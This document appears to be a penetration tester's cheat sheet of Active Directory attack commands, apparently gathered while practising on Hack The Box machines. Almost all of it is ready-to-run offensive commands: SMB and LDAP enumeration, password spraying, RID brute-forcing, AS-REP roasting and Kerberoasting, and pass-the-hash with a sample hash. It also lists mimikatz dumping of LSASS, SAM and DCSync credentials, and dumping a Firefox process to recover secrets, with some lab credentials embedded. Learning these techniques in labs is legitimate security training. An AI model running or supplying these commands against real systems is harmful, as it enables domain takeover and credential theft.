Contents
Evil-winrm – (when you have creds)
Crackmapexec – (may be better running in docker)
Secretsdump.py - (extracts creds and secrets – need creds)
GetNPUsers.py - (for ASREP roasting)
Kerbrute - (find valid usernames)
Bloodhound/neo4j/sharphound/bloodhound.py
Suggested websites:
https://www.hackingarticles.in/impacket-guide-smb-msrpc/
------------------------------------------------------------------------------------------------
Enum4linux:
- Enum4linux 10.10.10.10
- Use -h for options: -U = get userlist, -M = get machine list, -o = OS
- -u and -p = to provide credentials
SMBclient:
- smbclient -L 10.10.10.10 (may need the slashes)
- smbclient \\\\10.10.10.10\\sharename
- smbclient \\\\10.10.10.10\\C$ -U ‘administrator’
- you can also pass in a domain name – \\\\doozy.local\\
SMBmap:
- smbmap -u anonymous -H 10.10.10.10
- smbmap -u user1 -p password -H 10.10.10.10
Crackmapexec:
- crackmapexec has a ldap flag! – check out: https://wiki.porchetta.industries/ldap-protocol/authentication
Ldapsearch:
- ldapsearch -LLL -x -H ldap://test.local -b'' -s base '(objectclass=\*)' - no creds needed
- ldapsearch -h test.local -D 'ldap@test.local' -w password123 -b 'dc=test,dc=local'
- impacket-psexec.py username:password@ip - (may need to add '' to the pass)
- impacket-psexec administrator@10.129.210.78 -hashes :823452073d75b9d1cf70ebdf86c7f98e
- evil-winrm -i <ip> -u user -p pass - (may need to add '' to the pass)
- -H = to pass the hash
password spraying:
- crackmapexec smb <ip> -u users.lst -p password1 --continue-on-success
connect:
- crackmapexec smb 10.129.79.75 -u c.smith -p xRxRxPANCAK3SxRxRx - (may need to add '' to the pass)
bruteforce RID:
- cme smb 10.129.221.41 -u hazard -p stealth1agent --rid-brute
- secretsdump.py -just-dc-ntlm <domain>/<username>@<ip>
You do need a list of usernames.
- impacket-GetNPUsers doozy.local/ -dc-ip 10.10.10.10 -usersfile users.list -format john -no-pass
- python3 lookupsid.py test.local/john:password123@10.10.10.1
- ./kerbrute_linux_amd64 userenum -d doozy.local --dc 10.10.10.10 /tmp/userlist.txt
Harvesting tickets:
- Rubeus.exe harvest /interval:30
Bruteforce / password spraying:
- Rubeus.exe brute /password:Password1 /noticket
Kerberoasting:
- Rubeus.exe kerberoast
AS-Rep roasting:
- Rubeus.exe asreproast
Initial
- powershell -ep bypass
- . .\Powerview.ps1
Enumerate domain users /groups:
- Get-NetUser | select cn
- Get-NetGroup -Groupname *admin*
Shared Folders:
- Invoke-ShareFinder
(thank you to @dw3113r for this cheatsheet)
#Dump LSASS:
- mimikatz privilege::debug
- mimikatz token::elevate
- mimikatz sekurlsa::logonpasswords
#(Over) Pass The Hash
- mimikatz privilege::debug
- mimikatz sekurlsa::pth /user: /ntlm:<> /domain:
#List all available kerberos tickets in memory
- mimikatz sekurlsa::tickets
#Dump local Terminal Services credentials
- mimikatz sekurlsa::tspkg
#Dump and save LSASS in a file
- mimikatz sekurlsa::minidump c:\temp\lsass.dmp
#List cached MasterKeys
- mimikatz sekurlsa::dpapi
#List local Kerberos AES Keys
- mimikatz sekurlsa::ekeys
#Dump SAM Database
- mimikatz lsadump::sam
#Dump SECRETS Database
- mimikatz lsadump::secrets
#Inject and dump the Domain Controller’s Credentials
- mimikatz privilege::debug
- mimikatz token::elevate
- mimikatz lsadump::lsa /inject
#Dump the Domain’s Credentials without touching DC’s LSASS and also remotely
- mimikatz lsadump::dcsync /domain: /all #List and Dump local kerberos credentials
- mimikatz kerberos::list /dump
#Pass The Ticket
- mimikatz kerberos::ptt
#List TS/RDP sessions
- mimikatz ts::sessions
#List Vault credentials
- mimikatz vault::list
#One Liner Mimikatz - this is if you do not have a fully interactive shell
- .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
Refer to the cheatsheets for syntax
- impacket-smbserver -smb2support -username guest -password guest share /home/kali/doozy
- So bloodhound and neo4j work together and provides a GUI interface
- Start both: bloodhound and neo4j console (provide the creds)
- Sharphound is run on windows
- Bloodhound.py is run from Linux
- Both Sharphound and bloodyhound.py provide zip files to be uploaded to bloodhound gui
Invoking Bloodhound on windows:
- Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
- Upload to any windows box and run
- go to cd /mnt and create same name directories as smb dir
- sudo mount -t cifs //ip/sharename /mnt/sharenamecopy
with creds:
- sudo mount -t cifs -o 'username=joe,password=joe1' //IP/users /mnt/usernameofperson
- upload procdump.exe C:\Users\Chase\Desktop\procdump.exe
- get-process -name firefox (as you need the ID)
- .\procdump.exe -ma 5992 firefox.dmp
- cat <filename> | iconv -f UTF-16LE -t utf-8 ( there are other methods)
https://medium.com/@navkang/active-directory-enumeration-and-exploitation-for-beginners-604a32f45011
https://medium.com/@navkang/attacking-kerberos-e2b1be3dbbe9
https://medium.com/@navkang/post-exploitation-windows-ad-2e608c7858dc
Check out ippsec rocks website
- forest, sauna, sizzle